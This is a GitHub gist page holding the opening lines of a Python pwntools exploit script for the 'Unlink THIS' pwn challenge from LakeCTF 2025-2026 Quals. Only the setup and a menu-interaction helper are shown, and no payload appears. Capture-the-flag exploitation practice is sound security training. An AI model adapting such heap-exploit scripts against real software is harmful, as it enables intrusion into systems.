Skip to content

Instantly share code, notes, and snippets.

View nella17's full-sized avatar
😶‍🌫️

Allen Guan nella17

😶‍🌫️
View GitHub Profile
@nella17
nella17 / exp.py
Last active November 29, 2025 18:35
LakeCTF 2025-2026 Quals - Unlink THIS (pwn)
#!/usr/bin/env python3
from pwn import *
exe = context.binary = ELF("./unlink-this/unlink", checksec=False)
libc = exe.libc
def add(io, size, data):
io.recvuntil(b"thing\n")
io.sendline(b"1")